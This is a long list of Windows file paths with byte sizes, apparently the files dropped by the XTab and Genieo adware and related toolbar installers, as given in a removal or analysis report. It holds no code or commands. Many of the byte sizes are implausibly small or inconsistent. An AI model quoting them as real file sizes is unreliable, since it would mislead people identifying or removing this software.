      %Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
      %Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
      %Program Files% (x86)\XTab\ProtectService.exe (5312 bytes)
      %Program Files% (x86)\XTab\web\js\js.js (18 bytes)
      %Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1025.xpi (14 bytes)
      %Program Files% (x86)\XTab\web\img\default_add_logo.png (1 bytes)
      %Program Files% (x86)\XTab\skin\logo.png (5 bytes)
      %Program Files% (x86)\XTab\web\js\xagainit2.0.js (3 bytes)
      %Program Files% (x86)\XTab\web\js\xagainit.js (3 bytes)
      %Program Files% (x86)\XTab\web\img\googlelogo2.png (1526 bytes)
      %Program Files% (x86)\XTab\web\main.css (19 bytes)
      %Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
      %Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
      %Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
      %Program Files% (x86)\XTab\skin\close.png (3 bytes)
      %Program Files% (x86)\XTab\web\data.html (20 bytes)
      %Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
      %Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
      %Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
      %Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
      %Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
      %Program Files% (x86)\XTab\skin\about.png (4 bytes)
      %Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
      %Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
      %Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
      %Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
      %Program Files% (x86)\XTab\skin\settings.png (5 bytes)
      %Program Files% (x86)\XTab\web\img\default_logo.png (5 bytes)
      %Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
      %Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
      %Program Files% (x86)\XTab\web\js\common.js (2 bytes)
      %Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
      %Program Files% (x86)\XTab\SupTab.dll (6812 bytes)
      %Program Files% (x86)\XTab\web\js\ie8.js (156 bytes)
      %Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
      %Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
      %Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
      %Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
      %Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
      %Program Files% (x86)\XTab\msvcp110.dll (17526 bytes)
      %Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\422.json (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\unchecked.png (135 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\conf (83 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\BaofengUpdate.exe (2461 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\uninstallDlg2.xml (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\Thumbs.db (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checked.png (222 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code4.jpg (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\1.zip (197497 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\button1.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checkbox.png (545 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\button.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\loading_light.png (139 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bk_shadow.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\Thumbs.db (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bg.png (5064 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\min.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\close.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checkbox_select.png (783 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\DataBase (26688 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\2.zip (47952 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code6.jpg (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bg1.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\scrollbar.bmp (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code3.jpg (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\2[1].zip (70180 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\ffsearch_toolbar!1.0.0.1025.xpi (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code5.jpg (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\loading_bg.png (159 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code2.jpg (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\UninstallManager.exe (59286 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code1.jpg (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\lpd#4.3.0.xpi (6360 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\1[1].zip (296615 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\MessageBox.xml (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x_white.png (222 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack1.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack4.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\miniview.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_ui.js (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\buttonBg.png (141 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_bird.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_data.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack1sm.png (769 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\GenieoPartnerWindow.js (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame1sm.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo2.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\red.gif (801 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\main.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_bg.jpg (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cluster_default1.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\tpl\settings.tpl (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\button.png (342 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\notification.html (937 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_disabled_nav_next.png (161 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\warming_up.gif (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\opera_extension.png (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\notification_controls.png (441 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_8.png (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\Preferences.js (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extOpera1.png (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\big_image_frame.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frameSm.png (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_8sm.png (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_fr.png (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tryAgainButton.png (710 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\fr.css (211 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\miniview.html (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvAF24.tmp (82165 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\page_arrows_blue.png (277 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner_ru.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\heart.png (658 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\ServerConnector.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cmd_close_red.gif (840 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieoRss.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\notification.html (860 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\buttonSp.png (837 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\partner_item_bg.gif (879 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\default_image.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.project (487 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\set_full_view_btn.png (536 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewPublish.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\birthday.css (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_disabled_nav_prev.png (164 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariWin1.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\button.png (342 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\title.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\prototype.jsonp.js (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\okCancelButton.png (734 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ad_no_image.png (876 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cluster_default.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\notification_popup_bg.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\bummer.png (750 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac3.png (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\hotItemIcon.png (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\happy.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_6.png (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\social_icons.png (893 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\redSqSm.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extChromeMac1.png (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitterButton.png (955 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\h_bg.png (331 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_ru.properties (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\attention.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\settings.html (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\favorite_site_mask.png (176 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\aggregation.html (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\x.gif (828 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\all-genieo-sp-pack.js (15168 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_btn.png (625 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_enabled_nav_prev.png (153 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\big_quote.gif (203 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\message_note.png (696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\DataProcessor.js (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-overcast.png (975 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac1.png (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\page_arrows.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ohBg.gif (879 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\layer.html (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\prog_bar_prog.gif (166 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\upper_border.gif (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-clear-night.png (961 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\follow_facebook_btn.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_video_bg.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_ru.json (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\round_corners_5px.png (182 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sendFeedbackButton.jpg (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_4.png (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prog_bar_prog.gif (141 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie8.css (745 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\item_bg.png (264 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\picFrames.png (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_next.gif (855 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_application.js (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template1.html (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\slideshow.js (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\constants.js (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\share_btn.png (553 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\pagelet.js (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\browser_not_supported.html (125 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\smallGrey.gif (803 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\covers.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack2.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\footer_bg.png (121 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\older_items_arrow.gif (49 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sidebar_text_ad_bg.png (564 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\arrow_down.gif (68 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFinishButton.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\analytics.html (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\itemsRotate.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1_.jpg (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_disabled_nav_next.png (161 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\rssButton.png (580 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame.png (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template3sm.jpg (7192 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\hp_guard.html (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\grad.png (171 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template2.html (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\google_search_btn.png (166 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sad.png (971 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\login_facebook_btn.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery.min.js (3312 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\bug.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\json.js (11 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack3sm.png (937 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_next2.gif (90 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\logDbgLoadPhase.js (51 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\social_connector.js (11 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-few-clouds-night.png (965 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tw.gif (241 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\bg.jpg (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x.gif (828 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\set_to_miniview.png (203 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\grey.gif (817 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\utils.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\message_heart.png (765 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_3.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\fbButton.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\share_popup_arrow.png (219 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\personalization_meter_bg.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\utils.js (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1.jpg (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\Activators.js (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\noitems.html (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\followbutton.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\logo_icon.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\orig\field_fr.properties (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\thumb_up.png (697 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\splash.js (13 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\default_image.jpg (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\classes.js (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\signUpButton.png (863 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_main.js (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\birthday_not_connected_bg.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\warning.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\pagging_arrows.png (227 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\bug.png (682 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\LocationManager.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification_ui.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\birthday_cake.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\small_arrow_down.png (192 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_unfollow.png (849 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariMac.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_5.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prog_bar.gif (101 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\buttonSp.png (837 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\topic_x.png (329 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie7.css (1 bytes)
